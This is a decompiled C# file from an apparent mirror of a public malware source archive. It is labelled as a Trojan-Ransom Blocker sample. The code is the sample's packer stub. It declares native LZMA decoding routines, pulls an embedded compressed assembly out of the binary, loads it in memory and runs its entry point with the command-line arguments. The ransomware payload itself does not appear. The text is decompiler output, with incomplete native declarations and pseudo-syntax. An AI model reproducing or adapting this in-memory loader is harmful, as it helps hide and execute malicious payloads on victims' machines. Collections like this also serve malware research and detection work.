mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
119 lines
4.7 KiB
C#
119 lines
4.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: <Module>
|
|||
|
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Security;
|
|||
|
|
|||
|
internal class \u003CModule\u003E
|
|||
|
{
|
|||
|
public static __FnPtr<int (uint, uint, uint)> LzmaVirtualFree;
|
|||
|
public static __FnPtr<uint (uint, uint, uint, uint)> LzmaVirtualAlloc;
|
|||
|
|
|||
|
public static unsafe int main()
|
|||
|
{
|
|||
|
byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()];
|
|||
|
rawAssembly.Initialize();
|
|||
|
fixed (byte* numPtr = &rawAssembly[0])
|
|||
|
{
|
|||
|
if (\u003CModule\u003E.GetoriginalData(numPtr) != 0)
|
|||
|
{
|
|||
|
Assembly assembly = Assembly.Load(rawAssembly);
|
|||
|
int count1 = assembly.EntryPoint.GetParameters().Count;
|
|||
|
object[] parameters = new object[count1];
|
|||
|
if (count1 != 0)
|
|||
|
{
|
|||
|
string[] commandLineArgs = Environment.GetCommandLineArgs();
|
|||
|
int count2 = Environment.GetCommandLineArgs().Count;
|
|||
|
string[] strArray = new string[count2 - 1];
|
|||
|
int index = 1;
|
|||
|
if (1 < count2)
|
|||
|
{
|
|||
|
do
|
|||
|
{
|
|||
|
strArray[index - 1] = commandLineArgs[index];
|
|||
|
++index;
|
|||
|
}
|
|||
|
while (index < count2);
|
|||
|
}
|
|||
|
parameters[0] = (object) strArray;
|
|||
|
}
|
|||
|
// ISSUE: explicit non-virtual call
|
|||
|
__nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters));
|
|||
|
}
|
|||
|
return 0;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int RangeDecoderBitTreeDecode(
|
|||
|
[In] ushort* obj0,
|
|||
|
[In] int obj1,
|
|||
|
[In] _CRangeDecoder* obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int RangeDecoderReverseBitTreeDecode(
|
|||
|
[In] ushort* obj0,
|
|||
|
[In] int obj1,
|
|||
|
[In] _CRangeDecoder* obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe byte LzmaLiteralDecodeMatch(
|
|||
|
[In] ushort* obj0,
|
|||
|
[In] _CRangeDecoder* obj1,
|
|||
|
[In] byte obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int LzmaDecode(
|
|||
|
[In] byte* obj0,
|
|||
|
[In] uint obj1,
|
|||
|
[In] int obj2,
|
|||
|
[In] int obj3,
|
|||
|
[In] int obj4,
|
|||
|
[In] byte* obj5,
|
|||
|
[In] uint obj6,
|
|||
|
[In] byte* obj7,
|
|||
|
[In] uint obj8);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int LzmaBlockUnPack(
|
|||
|
[In] byte* obj0,
|
|||
|
[In] byte* obj1,
|
|||
|
[In] __FnPtr<uint (uint, uint, uint, uint)> obj2,
|
|||
|
[In] __FnPtr<int (uint, uint, uint)> obj3);
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern uint GetoriginalSize();
|
|||
|
|
|||
|
[SuppressUnmanagedCodeSecurity]
|
|||
|
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
|
|||
|
public static extern unsafe int GetoriginalData([In] byte* obj0);
|
|||
|
}
|